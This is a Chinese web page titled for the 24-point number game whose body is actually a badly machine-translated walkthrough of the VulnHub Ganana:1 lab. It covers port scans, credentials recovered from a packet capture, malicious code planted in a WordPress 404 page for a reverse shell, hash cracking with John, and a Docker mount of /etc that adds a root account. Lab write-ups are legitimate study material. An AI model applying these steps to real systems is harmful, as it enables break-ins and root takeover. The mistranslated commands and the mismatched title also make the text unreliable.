24点题目解题思路,24点游戏例题

  24点题目解题思路,24点游戏例题

  vulnhub Ganana:1解题思路发现目标地址信息收集获得初始壳特权提升

  发现目标地址

  1.目标主机网卡测量与控制(测量和控制)地址为0800279564DD,如下所示;

  2.使用以下命令扫描目标主机地址;

  苏多网发现-r 192。168 .2 .1192 .168 .2 .134 08:00:27:95:64:DD 2 120件系统技术有限公司信息收集1.使用如下命令对目标进行端口扫描,如下所示;

  nmap-vv-reason-Pn-A-OSS can-guess-version-all-p-192168 .2 .13422/TCP关闭ssh连接-拒绝80/TCP打开http syn-ack Apache httpd(PHP 7。3 .17)443/TCP open SSL/http syn-ack Apache httpd(PHP 7。3 .17)6777/TCP open FTP syn-ack vsftpd 3。0 .3使用如下命令对目标进行服务扫描,如下所示;

  Nikto-h 192.168.2.134-Nikto v 2。1 .6-目标IP: 192.168.2.134目标主机名:192 .168 .2 .134目标端口:80开始时间:2020-06-29 21:15:21 (GMT-4)服务器:阿帕奇检索到的x供电的头:PHP/7.3.17未定义x-XSS-保护头。该头可以提示用户代理防止发现某些形式的跨站脚本不常用头"链接",内容为:http://192 .168 .2 .134/WP-JSON/;rel=https://api.w.org/未设置x-内容-类型-选项标头。这可能允许用户代理以不同于找到的哑剧类型不常见标题" x-重定向通过"的方式呈现站点的内容,内容:WordPress未找到公共网关接口目录(使用-C all 强制检查所有可能的目录)robots.txt中的条目"/wp-admin/"返回非禁止或重定向超文本传送协议代码(302)“机器人。txt "包含2个应手动查看的条目。发现不常见的标头“tcn”,其内容为:列出Apache模式协商启用了多视图,这使得攻击者能够轻松地暴力破解文件名。请参阅http://www.wisec.it/sectou.php?id=4698ebdc59d15。找到了"索引"的以下替代项:index.php Web服务器返回了包含垃圾超文本传送协议方法的有效响应,这可能会导致误报Cookie创建时未使用httponly标志Cookie转到创建时未使用httponly标志饼干回来了创建时未使用httponly标志找到不常见的头" x-ob_mode ",内容为:1操作系统VD b-3092:/phpMyAdmin/ChangeLog:phpMyAdmin用于管理关系型数据库数据库,应受到保护或仅限于授权的主机OSVDB-3092: /secret/:这可能很有趣./WP-link-opml . PHP:这个博客脚本揭示了已安装的版本8 . OSVDB-3092:/license . txt:找到的许可证文件可能会识别站点软件/wp-app.log: Wordpress的wp-app.log可能会泄露应用程序/系统细节. log: Wordpress的wp-app.log可能会泄露应用程序/系统的详细信息。/:找到一个博客安装/wordpress:找到了一个博客安装/phpmyadmin/: phpMyAdmin目录找到OS VD b-3092:/phpMyAdmin/README:phpMyAdmin用于管理关系型数据库数据库,应该受到保护或仅限于授权的主机。7919请求:远程主机上报告了0个错误和24个项目结束时间:2020-06-29 21:21:53 (GMT-4)秒)-测试了一台主机3。根据日高扫描结果得知,目标80端口使用博客框架,使用wpscan进行扫描,如下所示;

  wps can-URL http://192。168 .2 .134-列举AP,at,cb,dbe _ _ _ _ _ _ _ _ _ _ _,CB,dbe _ _ _ _ _ _ _ _ _ _ _,at,CB,dbe,_ _ _ _ _ _ _ _ _ at,CB,dbe,_ _ _ _ _ _ _ _ _ at,CB,dbe,_ _ _ _ _ _ _ _ _ at,db,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE,DBE @ fire fart _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _网址:http://192 . 168 .2 .134/[192 .168 .2 .134][ ]开始时间:周一2020年6月29日21时18分56秒有趣的发现:[]标题有趣的条目: -服务器:Apache -X-Powered-By:PHP/7。3 .17 -X-Mod-页面速度:1.13使用铁还原菌对目录进行扫描,得到如下结果;

  https://192 .168 .2 .134/任务

  5.根据提示可以猜测到用户名杰瑞特利,进行密码找回尝试;

  6.根据提示可知账户正确,接下来根据提示寻找pcapng文件,经过构造,可以通过jarret.pcapng进行访问,如下所示;

  http://192 .168 .2 .134 jarret。常设仲裁法院png 7 .得到一个网络封包分析包,启动网络封包分析对文件进行分析;

  8.经过查看流量包,得到如下信息;

  jarret lee没有密码jarret lee的密码是jarret jarret lee jarret lee NoBrUtEfOrCe _ _ r3qu 1 r3d _ _

  9.使用账号密码登录尝试;

  10.登录成功,发现草稿中存在一个base64密文,使用解密工具解密结果如下;

  qgx 3 yxlzlulatu 3 vwm 3 ITU 2 vjdxizlxbau 1n 3 mfj kise @ l ways-@-Sup3r-secur 3-p @ ss w0 rd!11.使用该密码登录博客不成功,登录使用成功,如下所示;

  12.查看博客用户密码,修改charleywalker密码,如下所示;

  13.使用账号charleywalker和密码NoBrUtEfOrCe _ _ R3Qu1R3d _ _进行登录,如下所示;

  14.在404.php中写入恶意代码,如下所示;

  获得初始外壳1。开启监听,构造反弹壳,对404页面访问尝试;

  特权提升1.使用如下命令获得电传打字机(teletypewriter)壳牌公司;

  python3 -c 导入ptypty.spawn(/自由的小海豚/bash) 2 .查看用户列表发现该用户具有码头工人权限;

  uid=1003(JEE范)GID=1005(JEE范)groups=1005(JEE范),115(码头工人)3 .使用用户贾雷特利密码NoBrUtEfOrCe _ _ R3Qu1R3d _ _切换用户到杰瑞特利,查看家文件,如下所示;

  4.发现密文,使用base64解密,得到生命用户文件;

  amvldmfuoiq 2 jexytmfryujssi 90 dvgmmekyknnaxlsay 9 mwtjnjzuzwnxo 5 vp5 awv 6 c 05 ZZ 2 ouns 9 oumdgukjzhj 3 as 8 ysvbrvu 8 wcnfwsu 0 ztz H2 exnjndhnm 1 pwby 9 zshvvlnf 3 qmy 0 VTE 6 MTG 0 mza 6 MDO 5 otk 5 o 3 OJ 6 JEE van:6 $ LX naka brj/tl5f 2 a $ 1

  5.使用约翰进行破解,如下所示;

  kali @ kali:~/oscp/passwd/John $ sudo John-rules-word list=/usr/share/word lists/rock you。txt passswdhadow。txt[sudo]kali的密码:使用默认输入编码:UTF-8加载一个密码哈希(sha512crypt,crypt(3)$ 6 $[sha 512 128/128 AVX 2x])成本1(迭代计数)为5000所有加载的哈希将运行8个OpenMP线程按“q”或.有使用“展示”选项显示所有破解的密码可靠会话完成

  6.得到密码xxdpj (jeevan),切换用户,使用码头工人提权;

  docker run-v/etc/:/mnt-it alpinecd/mntecho Raj:$ 6 $ bie ayf 4 pzdp 5 qjxh $ 00 iurpimugng jwdarauxbfu 76 xovc 6 mwuqme 479 un 28 nesybqxow 7 tilxqrn 99 njcfvisjtjixgijtticf 720:0:root:/root:/自由的小海豚/bash 密码

  /mnt # exit jeevan @ debian:/home/jarretlee $ su rajsu Raj password:kali root @ debian:/home/jarretlee #

  7.权利被成功地提出。检查支持文件。

  因为中途关机,目的地址变了。由于我是新手,有不对的地方请指正。

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: